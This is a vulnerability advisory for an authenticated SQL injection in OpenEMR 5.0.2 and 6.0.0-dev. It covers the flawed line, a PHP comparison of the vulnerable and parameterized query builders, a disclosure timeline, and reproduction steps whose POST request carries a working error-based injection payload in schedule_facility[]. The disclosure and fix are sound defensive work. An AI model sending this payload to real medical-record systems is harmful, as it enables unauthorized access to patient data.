Product: OpenEMR 6.0.0-dev, OpenEMR 5.0.2(5)
Vulnerability: SQL injection
Discovered: Kutlymurat Mambetniyazov (@manfromkz)
Acknowledgements: NitroTeam.kz
Date: 11/24/2020
Description: Ineffective use of add_escape_custom() in interface/usergroup/usergroup_admin.php leads to SQL injection. The imploded schedule_facility[] list is escaped but then interpolated into a NOT IN (...) clause without surrounding quotes, so input that contains no quote characters is passed to the database unchanged and parsed as SQL.
Requirements: the global restrict_user_facility enabled, and an administrator account
Tested on: Windows 10, Apache 2.4, 10.3.22-MariaDB. PHP 7.1.33 for OpenEMR 5.0.2(5) and PHP 7.4 for OpenEMR 6.0.0-dev
Vulnerable code: interface/usergroup/usergroup_admin.php:150
and facility_id not in (" . add_escape_custom(implode(",", $_POST['schedule_facility'])) . ")", array($_POST["id"]));
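The defect above and its fix, as an added illustration that is not OpenEMR's own code. escapeLikeOpenEMR() is a stand-in for add_escape_custom() (assumed to behave like mysqli_real_escape_string, escaping quotes and backslashes but never adding quotes); both builders return the "facility_id not in (...)" clause from line 150 together with the values that belong in the bind array.

```php
<?php
// Stand-in for add_escape_custom(): escapes quote, backslash, NUL and control
// characters, but never wraps the value in quotes (assumption, see lead-in).
function escapeLikeOpenEMR(string $s): string
{
    return addcslashes($s, "\\\0\n\r'\"\x1a");
}

// Vulnerable pattern from the advisory: the imploded list is interpolated into
// the query with no surrounding quotes, so any input without quote characters
// passes through the escaping function unchanged and is parsed as SQL.
function buildClauseVulnerable(array $facilities): array
{
    $clause = "facility_id not in (" . escapeLikeOpenEMR(implode(",", $facilities)) . ")";
    return [$clause, []];            // nothing is bound; the list is literal SQL
}

// Hardened pattern: accept only integer ids and give each one its own "?"
// placeholder, so the values reach the server as bound parameters (the same
// "?" style the advisory's own line already uses for $_POST["id"]).
// Rejecting bad input outright is the safe default for an admin-only form.
function buildClauseHardened(array $facilities): array
{
    $ids = [];
    foreach ($facilities as $f) {
        if (!is_scalar($f) || !preg_match('/^\d+$/', (string) $f)) {
            throw new InvalidArgumentException("facility id must be a non-negative integer");
        }
        $ids[] = (int) $f;
    }
    if ($ids === []) {
        throw new InvalidArgumentException("at least one facility id is required");
    }
    $placeholders = implode(",", array_fill(0, count($ids), "?"));
    return ["facility_id not in (" . $placeholders . ")", $ids];
}

// Constructed check: a plain id list is accepted, a non-numeric entry is
// rejected by the hardened builder but passes the vulnerable one untouched.
[$clause, $binds] = buildClauseHardened(["1", "3"]);
echo $clause . " with binds " . implode(",", $binds) . PHP_EOL;   // (?,?) with 1,3
[$unsafe] = buildClauseVulnerable(["1", "not-a-number"]);
echo $unsafe . PHP_EOL;                                            // input reaches SQL as-is
try {
    buildClauseHardened(["1", "not-a-number"]);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . PHP_EOL;
}
```

In the real handler the returned $ids would be appended to the existing bind array (after the uid value) and passed to sqlStatement() together with the placeholder clause.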
Steps to reproduce:
1. Run the following SQL query to enable the restrict_user_facility global:
UPDATE `globals` SET `gl_value` = '1' WHERE `globals`.`gl_name` = 'restrict_user_facility'
2. Send the following POST request (substitute your own Host, a valid csrf_token_form and the OpenEMR session cookie of an administrator):
POST /interface/usergroup/usergroup_admin.php HTTP/1.1
Host: openemr60.kz
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 420
Connection: close
Cookie: OpenEMR=FolYY6Y6%2CNwDDANwci5GfRdQXosr2ZkZ76e7PNHPJGTTc-eD;
csrf_token_form=639ee383724ab4de7bd56e47a454ea96cadeb6de&pre_active=1&get_admin_id=0&admin_id=&check_acl=&mname=&lname=Administrator&facility_id=3&taxid=&drugid=&upin=&see_auth=1&npi=&job=&main_menu_role=standard&patient_menu_role=standard&access_group%5B%5D=Administrators&comments=&id=1&mode=update&privatemode=user_admin&secure_pwd=1&schedule_facility[]=1&schedule_facility[]=extractvalue(0x0a,concat(0x0a,(user())))
Screenshot for 6.0.0-dev:
Screenshot for 5.0.2(5):
Timeline of the vulnerability:
11/24/2020 – vulnerability discovered
11/24/2020 – notification to vendor
11/25/2020 – confirmation by vendor
11/27/2020 – reservation of CVE ID at MITRE
01/07/2021 – patch release
02/15/2021 – published